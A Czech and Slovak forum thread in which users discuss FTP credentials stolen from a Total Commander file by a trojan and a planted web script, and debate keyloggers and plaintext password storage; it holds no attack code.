Moje přítulka má login(právě ten inkriminovaný), takže jsme přišli na to, že to bylo získáno z jejího počítače. Nicméně si nebyla vědoma, že by lezla někam nebo chytla nějaký spyware. Až náhle byl oběven nějakej trojskej koníček , kterým ji nakazil její bratr, kterému se také dostali na web už dávno. Pak se ještě jako vrchol na webovky dal skriptík...

Mnoo a tenhle skript odesílá ten soubor jak jsou v něm uložené ftp údaje z totalcommandera.

[Rainbow]

Cize klasika - najvacsi bezpecnostny problem Linux (a unix) serverov su windows, z ktorych sa tam mnohi ludia pripajaju.

[PiT]

Cize klasika - najvacsi bezpecnostny problem Linux (a unix) serverov su windows, z ktorych sa tam mnohi ludia pripajaju.

jj, z toho dovodu vsetky hesla, ktore mam pod XP (vyjma putty/winscp pgp klucov) radsej pracne vypisujem...

[monsoon]

jj, z toho dovodu vsetky hesla, ktore mam pod XP (vyjma putty/winscp pgp klucov) radsej pracne vypisujem...

To si imho moc nepomuzes, staci nejaky keylogger a jsme tam, kde jsme byli. Jde o to, ze se ti tam neco dostane.

[Rainbow]

Trochu bezpecnejsie to je, lebo si staci zaistit, aby v momente zadavania hesla ziadny keylogger nebezal. Pri heslach ulozenych v nejakych INI suboroch staci, aby sa na moment spustil nejaky program, ktory to niekam uploadne. Uplne idealne riesenie je nechavat to na zdielanom disku

[Peca-on-line]

Tak ono je to hlavně o uživatelích, ne o platformě, například zmíněný Total Commander důrazně varuje, že hesla se ukládají jen v plaintextu a že to není bezpečné.